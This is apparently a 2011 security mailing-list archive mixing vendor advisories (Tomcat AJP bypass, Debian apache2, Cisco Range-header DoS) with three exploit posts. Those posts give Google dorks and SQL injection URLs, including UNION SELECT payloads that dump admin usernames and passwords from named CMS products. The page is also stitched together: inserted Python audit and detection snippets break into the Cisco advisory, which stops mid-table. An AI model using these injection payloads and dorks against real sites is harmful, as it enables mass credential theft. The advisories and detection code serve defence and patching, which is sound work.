[SECURITY] CVE-2011-3190 Apache Tomcat Authentication bypass and information disclosure

2011-08-30 Thread Mark Thomas
CVE-2011-3190 Apache Tomcat Authentication bypass and information disclosure

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
- Tomcat 7.0.0 to 7.0.20
- Tomcat 6.0.0 to 6.0.33
- Tomcat 5.5.0 to 5.5.33
- Earlier, unsupported versions may also be affected

Description:
Apache Tomcat supports the AJP protocol which is used with reverse
proxies to pass requests and associated data about the request from the
reverse proxy to Tomcat. The AJP protocol is designed so that when a
request includes a request body, an unsolicited AJP message is sent to
Tomcat that includes the first part (or possibly all) of the request
body. In certain circumstances, Tomcat did not process this message as a
request body but as a new request. This permitted an attacker to have
full control over the AJP message which allowed an attacker to (amongst
other things):
- insert the name of an authenticated user
- insert any client IP address (potentially bypassing any client IP
address filtering)
- trigger the mixing of responses between users

The following AJP connector implementations are not affected:
org.apache.jk.server.JkCoyoteHandler (5.5.x - default, 6.0.x - default)

The following AJP connector implementations are affected:

org.apache.coyote.ajp.AjpProtocol (6.0.x, 7.0.x - default)
org.apache.coyote.ajp.AjpNioProtocol (7.0.x)
org.apache.coyote.ajp.AjpAprProtocol (5.5.x, 6.0.x, 7.0.x)

Further, this issue only applies if all of the following are true
for at least one resource:
- POST requests are accepted
- The request body is not processed


Example: See https://issues.apache.org/bugzilla/show_bug.cgi?id=51698

Mitigation:
Users of affected versions should apply one of the following mitigations:
- Upgrade to a version of Apache Tomcat that includes a fix for this
issue when available
- Apply the appropriate patch
  - 7.0.x http://svn.apache.org/viewvc?rev=1162958&view=rev
  - 6.0.x http://svn.apache.org/viewvc?rev=1162959&view=rev
  - 5.5.x http://svn.apache.org/viewvc?rev=1162960&view=rev
- Configure the reverse proxy and Tomcat's AJP connector(s) to use the
requiredSecret attribute
- Use the org.apache.jk.server.JkCoyoteHandler AJP connector (not
available for Tomcat 7.0.x)

Credit:
The issue was reported via Apache Tomcat's public issue tracker.
The Apache Tomcat security team strongly discourages reporting of
undisclosed vulnerabilities via public channels. All Apache Tomcat
security vulnerabilities should be reported to the private security team
mailing list: secur...@tomcat.apache.org

References:
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html
http://tomcat.apache.org/security-5.html
https://issues.apache.org/bugzilla/show_bug.cgi?id=51698
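
One way to check the Tomcat side of the requiredSecret mitigation above, as an added example that is not part of the advisory or of Tomcat itself: it classifies every AJP Connector in a server.xml by the connector classes the advisory lists. The sample XML and the finding labels are constructed for illustration; the "AJP/1.3" alias is reported for review because the class it resolves to depends on the Tomcat version.

```python
import xml.etree.ElementTree as ET

# Connector classes the advisory lists as affected / not affected.
AFFECTED = {
    "org.apache.coyote.ajp.AjpProtocol",
    "org.apache.coyote.ajp.AjpNioProtocol",
    "org.apache.coyote.ajp.AjpAprProtocol",
}
NOT_AFFECTED = {"org.apache.jk.server.JkCoyoteHandler"}

# Constructed sample server.xml (not taken from any real deployment).
SAMPLE_SERVER_XML = """
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1"/>
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
    <Connector port="8010" protocol="org.apache.coyote.ajp.AjpAprProtocol"/>
    <Connector port="8011" protocol="org.apache.coyote.ajp.AjpNioProtocol"
               requiredSecret="constructed-placeholder"/>
    <Connector port="8012" protocol="org.apache.jk.server.JkCoyoteHandler"/>
  </Service>
</Server>
"""

def audit_ajp_connectors(server_xml):
    """Return (port, protocol, finding) for every AJP connector in server.xml."""
    findings = []
    for conn in ET.fromstring(server_xml).iter("Connector"):
        proto = conn.get("protocol", "HTTP/1.1")
        port = conn.get("port", "?")
        if proto in NOT_AFFECTED:
            findings.append((port, proto, "ok: connector not affected"))
        elif proto in AFFECTED or proto.upper().startswith("AJP/"):
            if conn.get("requiredSecret"):
                findings.append((port, proto, "ok: requiredSecret set"))
            elif proto in AFFECTED:
                findings.append((port, proto, "exposed: no requiredSecret"))
            else:
                # The "AJP/1.3" alias resolves to a version-dependent class.
                findings.append((port, proto, "review: alias, no requiredSecret"))
    return findings

if __name__ == "__main__":
    for row in audit_ajp_connectors(SAMPLE_SERVER_XML):
        print(*row, sep="\t")
```

This only inspects Tomcat's configuration; the reverse proxy must be configured with the same secret, as the mitigation states.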


[SECURITY] [DSA 2298-1] apache2 security update

2011-08-30 Thread Stefan Fritsch

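-------------------------------------------------------------------------
Debian Security Advisory DSA-2298-1                   secur...@debian.org
http://www.debian.org/security/                            Stefan Fritsch
August 29, 2011                        http://www.debian.org/security/faq
-------------------------------------------------------------------------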

Package: apache2
Vulnerability  : denial of service
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2010-1452 CVE-2011-3192

Two issues have been found in the Apache HTTPD web server:

CVE-2011-3192

A vulnerability has been found in the way the multiple overlapping
ranges are handled by the Apache HTTPD server. This vulnerability
allows an attacker to cause Apache HTTPD to use an excessive amount of
memory, causing a denial of service.

CVE-2010-1452

A vulnerability has been found in mod_dav that allows an attacker to
cause a daemon crash, causing a denial of service. This issue only
affects the Debian 5.0 oldstable/lenny distribution.


For the oldstable distribution (lenny), these problems have been fixed
in version 2.2.9-10+lenny10.

For the stable distribution (squeeze), this problem has been fixed in
version 2.2.16-6+squeeze2.

For the testing distribution (wheezy), this problem will be fixed soon.

For the unstable distribution (sid), this problem has been fixed in
version 2.2.19-2.

We recommend that you upgrade your apache2 packages.

This update also contains updated apache2-mpm-itk packages which have
been recompiled against the updated apache2 packages. The new version
number for the oldstable distribution is 2.2.6-02-1+lenny5. In the
stable distribution, apache2-mpm-itk has the same version number as
apache2.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



bizConsulting (prodotto.php?id) Remote SQL injection Vulnerability

2011-08-30 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## bizConsulting (prodotto.php?id)
##   
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.bizconsulting.it/
##  
## Persian Gulf 4 Ever!

Dork : Powered by: bizConsulting inurl:prodotto.php?id=

Exploit:

www.victim.com/prodotto.php?id=-1 union select concat(username,0x3a,password),2 
from adm_amministratori

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


Cisco Security Advisory: Apache HTTPd Range Header Denial of Service Vulnerability

2011-08-30 Thread Cisco Systems Product Security Incident Response Team

Cisco Security Advisory: Apache HTTPd Range Header Denial of Service
Vulnerability

Advisory ID: cisco-sa-20110830-apache

Revision 1.0

For Public Release 2011 August 30 1600 UTC (GMT)

Summary
=======

The Apache HTTPd server contains a denial of service vulnerability
when it handles multiple, overlapping ranges. Multiple Cisco products
may be affected by this vulnerability.

Mitigations that can be deployed on Cisco devices within the network
are available in the Cisco Applied Intelligence companion document
for this Advisory: 
http://tools.cisco.com/security/center/viewAMBAlert.x?alertId=24024

This advisory is posted at:
http://www.cisco.com/warp/public/707/cisco-sa-20110830-apache.shtml

Affected Products
=================

Cisco is currently evaluating products for possible exposure to this
vulnerability. Products will only be listed in the Vulnerable
Products or Products Confirmed Not Vulnerable sections of this
security advisory when a final determination about exposure is made.
Products that are not listed in either of these two sections are
still being evaluated.

Vulnerable Products
+------------------

This section will be updated when more information is available. The
following products are confirmed to be affected by this
vulnerability:

  * Cisco MDS 9000 NX-OS Software releases prior to 4.2.x are
    affected. Cisco MDS 9000 NX-OS Software releases 4.2.x and later
    are not affected.
  * Cisco NX-OS Software for Cisco Nexus 7000 Series Switches
    releases prior to 4.2.x are affected. Cisco NX-OS Software for
    Cisco Nexus 7000 Series Switches versions 4.2.x and later are not
    affected.
  * Cisco TelePresence Video Communication Server (Cisco TelePresence
    VCS)
  * Cisco Video Surveillance Manager (VSM)
  * Cisco Video Surveillance Operations Manager (VSOM)
  * Cisco Wireless Control System (WCS)


Products Confirmed Not Vulnerable
+--------------------------------

The following products are confirmed not vulnerable:

  * Cisco ASA 5500 Series Adaptive Security Appliances
  * Cisco Catalyst 6500 Series ASA Services Module
  * Cisco Catalyst 6500 Series Firewall Services Module
  * Cisco Fabric Manager
  * Cisco Identity Services Engine
  * Cisco Intercompany Media Engine
  * Cisco IOS Software
  * Cisco IOS XE Software
  * Cisco IOS XR Software
  * Cisco IP Interoperability and Collaboration System (IPICS)
  * Cisco Unified IP Phones
  * Cisco MDS 9000 NX-OS Software releases 4.2.x or later (prior
    versions are affected)
  * Cisco NX-OS Software for Nexus 7000 Series Switches releases
    4.2.x or later (prior versions are affected)
  * Cisco Prime Central
  * Cisco Prime Optical
  * Cisco Prime Performance Manager
  * Cisco TelePresence Server
  * Cisco Unified Communications Manager (formerly Cisco CallManager)
  * Cisco Unity
  * Cisco Unity Connection
  * Cisco Wireless LAN Controllers (WLC)

This section will be updated when more information is available.
 
Details
=======

The Apache HTTPd server contains a denial of service vulnerability
when it handles multiple overlapping ranges. Multiple Cisco products
may be affected by this vulnerability.

The following Cisco bug IDs are being used to track potential
exposure to this vulnerability. The following Cisco bug IDs do not
confirm that a product is vulnerable; rather, the Cisco bug IDs
indicate that the product is under investigation by the appropriate
product teams.

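+------------------------------------------------------+--------------+
| Cisco Product                                        | Cisco bug ID |
|------------------------------------------------------+--------------|
| Cisco ACE 4710 Appliance                             | CSCts35635   |
|------------------------------------------------------+--------------|
| Cisco ACE Application Control Engine Module          | CSCts35610   |
|------------------------------------------------------+--------------|
| Cisco ACE GSS 4400 Series Global Site Selector (GSS) | CSCts33313   |
|------------------------------------------------------+--------------|
| Cisco ACE XML Gateway                                | CSCts33321   |
|------------------------------------------------------+--------------|
| Cisco Active Network Abstraction                     | CSCts33317   |
|------------------------------------------------------+--------------|
| Cisco ASA 5500 Series Adaptive Security Appliances   | CSCts33180   |
|------------------------------------------------------+--------------|
| Cisco CNS Network Registrar                          | CSCts36064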
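
The Debian and Cisco advisories above both describe the CVE-2011-3192 condition as a request with multiple overlapping ranges. The following detection helper is an added example, not code from Apache, Debian or Cisco: it resolves a Range header against a body size and reports how many ranges it holds, how many pairs overlap, and how many bytes it asks for relative to the body. The thresholds in is_suspicious and the sample header values are assumptions constructed for illustration.

```python
import re

def parse_ranges(header, size):
    """Resolve a 'bytes=...' Range value to (start, end) pairs for a body of `size` bytes."""
    unit, _, spec = header.partition("=")
    if unit.strip().lower() != "bytes":
        return []
    spans = []
    for part in spec.split(","):
        m = re.fullmatch(r"\s*(\d*)-(\d*)\s*", part)
        if not m or not (m.group(1) or m.group(2)):
            continue                      # malformed range-spec: skip it
        first, last = m.groups()
        if first == "":                   # suffix form "-N": the last N bytes
            start, end = max(size - int(last), 0), size - 1
        else:
            start = int(first)
            end = min(int(last), size - 1) if last else size - 1
        if start <= end:                  # drop unsatisfiable ranges
            spans.append((start, end))
    return spans

def range_cost(header, size):
    """Return (range count, overlapping pairs, bytes requested / body size)."""
    spans = sorted(parse_ranges(header, size))
    overlaps = 0
    for i, (_, end) in enumerate(spans):
        # Sorted by start, so a later span overlaps when it starts at or before `end`.
        overlaps += sum(1 for s, _ in spans[i + 1:] if s <= end)
    requested = sum(e - s + 1 for s, e in spans)
    return len(spans), overlaps, requested / max(size, 1)

def is_suspicious(header, size, max_ranges=5, max_ratio=1.0):
    """Flag many-range headers that overlap or request more bytes than the body has.

    max_ranges and max_ratio are assumed thresholds; tune them for your traffic.
    """
    count, overlaps, ratio = range_cost(header, size)
    return count > max_ranges and (overlaps > 0 or ratio > max_ratio)

# Constructed sample header values for a 1000-byte resource.
NORMAL = "bytes=0-499,500-999"
OVERLAPPING = "bytes=" + ",".join(f"0-{n}" for n in range(100, 1000, 100))
```

Run over access logs that record the Range header, this separates ordinary multi-part requests from ones whose ranges overlap heavily.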

webyuss (prodotto.php?id) (quadri.php?id) Remote SQL injection Vulnerability

2011-08-30 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## webyuss (prodotto.php?id) (quadri.php?id)
##   
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.webyuss.com/
##  
## Persian Gulf 4 Ever!

Dork : Powered by webyuss inurl:prodotto.php?id=

Exploit:

www.victim.com/prodotto.php?id=[SQL]


Dork : Powered by webyuss inurl:quadri.php?id=

Exploit:

www.victim.com/quadri.php?id=[SQL]

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
## 


Pc Web Agency (prodotto.php?id) Remote SQL injection Vulnerability

2011-08-30 Thread ehsan_hp200
  IRANIAN THE BEST HACKERS IN THE WORLD 
##
 
##
## Remote SQL injection Vulnerability
##
## Pc Web Agency (prodotto.php?id)
##   
##
## AuTh0r : Ehsan_Hp200
##
## H0ME   : www.ehsanhp.blogsky.com
##
## Email  : ehsan_hp...@hotmail.com
##  
## Vendor : http://www.pcwebagency.it/
##  
## Persian Gulf 4 Ever!

Dork : Powered by Pc Web Agency inurl:prodotto.php?id=

Exploit:

www.victim.com/prodotto.php?id=-Null union select 
1,user,pswd,4,5,6,7,8,9,10,11,12,13,14,15,16 from login

#
SpeCial TanX To : Skote_Vahshat
##
###  IRANIAN THE BEST HACKERS IN THE WORLD 
##